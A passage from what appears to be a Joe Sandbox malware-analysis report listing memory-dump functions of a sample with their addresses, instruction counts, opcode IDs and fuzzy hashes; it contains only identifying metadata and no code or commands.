                                                                                                                                                                                            • Instruction Fuzzy Hash: CDE0C9B4D04208EFCB94DFA8D450A9DFBF4EB88310F14C1AA981997350D7319A52DF84
                                                                                                                                                                                            Function 048B1E44 Relevance: .0, Instructions: 23COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.1471614559.00000000048B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048B0000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_48b0000_nEnq-0023HHHDDJKSS1000025.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 46fb4637374ee8f64223c3accf23782a546ab8019d7df4e1a66320effd0a6529
                                                                                                                                                                                            • Instruction ID: 390d06a699f26cbab00edb68e6f07bf23735bdf3357de59dd5ce86fac3bb820f
                                                                                                                                                                                            • Opcode Fuzzy Hash: 46fb4637374ee8f64223c3accf23782a546ab8019d7df4e1a66320effd0a6529
                                                                                                                                                                                            • Instruction Fuzzy Hash: DCE086735492A05FD312EB38ECF27CA7F609F56128F1901E6D084CFBB3E518C4168685
                                                                                                                                                                                            Function 0661F6C8 Relevance: .0, Instructions: 22COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.1477410597.0000000006600000.00000040.00000800.00020000.00000000.sdmp, Offset: 06600000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_6600000_nEnq-0023HHHDDJKSS1000025.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 26009f40fd84dc553dff5eb5b896ca99d03070ee4ae946203e78255772e03be1
                                                                                                                                                                                            • Instruction ID: 942e3be3fe0edead6015274ae170ff191d8522202c4056cc6586beac352eccc1
                                                                                                                                                                                            • Opcode Fuzzy Hash: 26009f40fd84dc553dff5eb5b896ca99d03070ee4ae946203e78255772e03be1
                                                                                                                                                                                            • Instruction Fuzzy Hash: C3E0C274E08208AFCB94DFAAD8506ACFBF4EB48200F1481A9881897351D735AA02DF80
                                                                                                                                                                                            Function 048BFC08 Relevance: .0, Instructions: 21COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.1471614559.00000000048B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048B0000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_48b0000_nEnq-0023HHHDDJKSS1000025.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 6b6e0e8241f36120d7647f20ea54aa9a71d008f13744632eab1422f7bc8e89f9
                                                                                                                                                                                            • Instruction ID: 02b122571279039daaa4b478b7908e2c95b678ea9c659bd45d064652d6c1b50f
                                                                                                                                                                                            • Opcode Fuzzy Hash: 6b6e0e8241f36120d7647f20ea54aa9a71d008f13744632eab1422f7bc8e89f9
                                                                                                                                                                                            • Instruction Fuzzy Hash: 37E04F74908218AFC704DF94D8509ADFBB8EB45300F109599DE4497341C631AA52EB94
                                                                                                                                                                                            Function 066188E0 Relevance: .0, Instructions: 20COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.1477410597.0000000006600000.00000040.00000800.00020000.00000000.sdmp, Offset: 06600000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_6600000_nEnq-0023HHHDDJKSS1000025.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 3a5871fedbb6951bb371584318de270b5ed3ed5a7762ab4bc44f1d5ed80602a6
                                                                                                                                                                                            • Instruction ID: f23b93aa55dd0ed40211bdd608a8883931383fd1bba0c65b99bae6329989375c
                                                                                                                                                                                            • Opcode Fuzzy Hash: 3a5871fedbb6951bb371584318de270b5ed3ed5a7762ab4bc44f1d5ed80602a6
                                                                                                                                                                                            • Instruction Fuzzy Hash: 1EE01A74D08208EFC794DF98D4406ACFBB4AB49204F1481E9C81857341C6315A42DB84
                                                                                                                                                                                            Function 0661DDF8 Relevance: .0, Instructions: 19COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.1477410597.0000000006600000.00000040.00000800.00020000.00000000.sdmp, Offset: 06600000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_6600000_nEnq-0023HHHDDJKSS1000025.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 389d57b9369250f258b5952e1060f82f64f5c56bfe194142f6ef717dca941be1
                                                                                                                                                                                            • Instruction ID: e00ee2c2466d193709fc37e7bfda5feea6952ceb4ccbf7695a9b1cf297300b68
                                                                                                                                                                                            • Opcode Fuzzy Hash: 389d57b9369250f258b5952e1060f82f64f5c56bfe194142f6ef717dca941be1
                                                                                                                                                                                            • Instruction Fuzzy Hash: DCE01274A08208EBCB54DF94D94156DFBB8EF45305F1491EDCC0857351CB316E52EB85
                                                                                                                                                                                            Function 0661B1C8 Relevance: .0, Instructions: 19COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.1477410597.0000000006600000.00000040.00000800.00020000.00000000.sdmp, Offset: 06600000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_6600000_nEnq-0023HHHDDJKSS1000025.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 2c9b6ef6b3440da2fa99e81c1dd7888f80f3bfeebede0661a74c761d20c2162d
                                                                                                                                                                                            • Instruction ID: d2e821430ee2082ab3f0f1cc9dd911dcc4d7e6d0249fe4bf7c9ac2c8f3ca9af2
                                                                                                                                                                                            • Opcode Fuzzy Hash: 2c9b6ef6b3440da2fa99e81c1dd7888f80f3bfeebede0661a74c761d20c2162d
                                                                                                                                                                                            • Instruction Fuzzy Hash: FDE0127190520CEBC750FFF4D80965EF7FCDB45210F1145A6C50497250EA315E10ABA6
                                                                                                                                                                                            Function 048BF088 Relevance: .0, Instructions: 19COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.1471614559.00000000048B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048B0000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_48b0000_nEnq-0023HHHDDJKSS1000025.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: b2afc1a1f33a2f9f585f2dbdd24c3e83be3f41a624086ecd571a2cdc1897dbc5
                                                                                                                                                                                            • Instruction ID: 3c7faa231bd0275fdc8920f034223998849848e3cdb7d5a11eec52535b8c41e4
                                                                                                                                                                                            • Opcode Fuzzy Hash: b2afc1a1f33a2f9f585f2dbdd24c3e83be3f41a624086ecd571a2cdc1897dbc5
                                                                                                                                                                                            • Instruction Fuzzy Hash: A0E0EC75905208ABC710EFF4D919B9EFBB8EB45211F0045E5D609D3150FF325A00ABA6
                                                                                                                                                                                            Function 048B0848 Relevance: .0, Instructions: 16COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.1471614559.00000000048B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048B0000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_48b0000_nEnq-0023HHHDDJKSS1000025.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: e62292f0a7afeedef100727a248565af174b97adcc3ed2326ccf2da84c7c0cee
                                                                                                                                                                                            • Instruction ID: 5b4245bbd141d8397a29c9c0f73416e2f2937d7ce7be054f0d110a1353d15d79
                                                                                                                                                                                            • Opcode Fuzzy Hash: e62292f0a7afeedef100727a248565af174b97adcc3ed2326ccf2da84c7c0cee
                                                                                                                                                                                            • Instruction Fuzzy Hash: 9FD01730E00208EF8B40EFB8E94155DB7F9EB84300B1085A9D808EB200EB316F009F95
                                                                                                                                                                                            Function 048BEEF8 Relevance: .0, Instructions: 11COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.1471614559.00000000048B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048B0000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_48b0000_nEnq-0023HHHDDJKSS1000025.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 744767288a9ae68946fc2643a982b3acdc6bdb56bb9425d757fa589c7317ebce
                                                                                                                                                                                            • Instruction ID: 39047199cf32e645f15d17d50bbfb1a7caea40650ddca8a08753044d4d4e3c7c
                                                                                                                                                                                            • Opcode Fuzzy Hash: 744767288a9ae68946fc2643a982b3acdc6bdb56bb9425d757fa589c7317ebce
                                                                                                                                                                                            • Instruction Fuzzy Hash: E6C08C300046084BD32037E8E40E3B9F26C9B82205F002640D94C81670AFB0B04099BB
                                                                                                                                                                                            Function 048B1E70 Relevance: .0, Instructions: 7COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.1471614559.00000000048B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048B0000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_48b0000_nEnq-0023HHHDDJKSS1000025.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 406dac5c139cdb57122e67df7a8140eb07c55dea271d7c8adc793fd4354e830c
                                                                                                                                                                                            • Instruction ID: b6a7e1941b05a5c068b030d6def5ecb392f4329ff73610c73c6f0e5c76012305
                                                                                                                                                                                            • Opcode Fuzzy Hash: 406dac5c139cdb57122e67df7a8140eb07c55dea271d7c8adc793fd4354e830c
                                                                                                                                                                                            • Instruction Fuzzy Hash: 95B092311402088F8200DB58D444C0073A8AB08A1430100D0E1088B232C621FC008A40

                                                                                                                                                                                            Non-executed Functions

                                                                                                                                                                                            Function 0661DE38 Relevance: .2, Instructions: 198COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.1477410597.0000000006600000.00000040.00000800.00020000.00000000.sdmp, Offset: 06600000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_6600000_nEnq-0023HHHDDJKSS1000025.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 98a84fa73ed367e68bc1f61bf3203d1a88b84a9862dae706303e0f194f522fa0
                                                                                                                                                                                            • Instruction ID: 82de575c7dd0080ac4ca84fa97a484c73a3a7a75d3fcbc982bb30927bd64eef5
                                                                                                                                                                                            • Opcode Fuzzy Hash: 98a84fa73ed367e68bc1f61bf3203d1a88b84a9862dae706303e0f194f522fa0
                                                                                                                                                                                            • Instruction Fuzzy Hash: 91813B70D04218CFEB64DFA5C844B9DFBF2BF99305F1880A9C409AB251DB749A96DF81
                                                                                                                                                                                            Function 0661E360 Relevance: .2, Instructions: 188COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.1477410597.0000000006600000.00000040.00000800.00020000.00000000.sdmp, Offset: 06600000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_6600000_nEnq-0023HHHDDJKSS1000025.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 5fb897cf318be8cd031d9cb57e3bc599c449506054a16e6bd509373129e5b782
                                                                                                                                                                                            • Instruction ID: e84558df1222dbd563c731e5986ad270c1fc4a361ae5cbd081eba13a884b98de
                                                                                                                                                                                            • Opcode Fuzzy Hash: 5fb897cf318be8cd031d9cb57e3bc599c449506054a16e6bd509373129e5b782
                                                                                                                                                                                            • Instruction Fuzzy Hash: CB713BB0D15208CFEB54DF99E484B9DBBF2BB89304F189025E809AB354D7B69856CF84
                                                                                                                                                                                            Function 06600040 Relevance: .1, Instructions: 95COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.1477410597.0000000006600000.00000040.00000800.00020000.00000000.sdmp, Offset: 06600000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_6600000_nEnq-0023HHHDDJKSS1000025.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 78cd7465d05c0327577654e11b9bc2001033937a18850e108570c4d3dda31c4f
                                                                                                                                                                                            • Instruction ID: 6e61d914c3c1ef71c97f22f92d5a8e75e21eba1582b7cb98034de364c7382d09
                                                                                                                                                                                            • Opcode Fuzzy Hash: 78cd7465d05c0327577654e11b9bc2001033937a18850e108570c4d3dda31c4f
                                                                                                                                                                                            • Instruction Fuzzy Hash: CF41E770D05229CBEB68CF5AC984B9AB6F6BB88304F00C0FAD50DA7254DB740AC5DF51
                                                                                                                                                                                            Function 06600028 Relevance: .1, Instructions: 66COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.1477410597.0000000006600000.00000040.00000800.00020000.00000000.sdmp, Offset: 06600000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_6600000_nEnq-0023HHHDDJKSS1000025.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 231d9064201c8952e69efd41c0dc98156931b4c02f82566b78b517cae6700adc
                                                                                                                                                                                            • Instruction ID: 859b1533c41fb272f3fce74b9c1bed1f63d3723c9b94542ec50bff6792817d8a
                                                                                                                                                                                            • Opcode Fuzzy Hash: 231d9064201c8952e69efd41c0dc98156931b4c02f82566b78b517cae6700adc
                                                                                                                                                                                            • Instruction Fuzzy Hash: AB21FBB1D046198BEB69CF2BC94479AFAF7AFC5304F04C0FAC51CA6254DB740A869F10
                                                                                                                                                                                            Function 048BB648 Relevance: .1, Instructions: 64COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.1471614559.00000000048B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048B0000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_48b0000_nEnq-0023HHHDDJKSS1000025.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 164bb698d9ce9573abfa81cd30218ad66cdd605e6b9e5ebed7db9062b773657d
                                                                                                                                                                                            • Instruction ID: ef0c2402908dfa0b3942854b034a94118675108de2b1a5035f72e90e1a588e2d
                                                                                                                                                                                            • Opcode Fuzzy Hash: 164bb698d9ce9573abfa81cd30218ad66cdd605e6b9e5ebed7db9062b773657d
                                                                                                                                                                                            • Instruction Fuzzy Hash: 27217AB1E056188FEB28CF5BCD5479AFAF7AFC9304F04C5A9C44CAA254DB741A858F41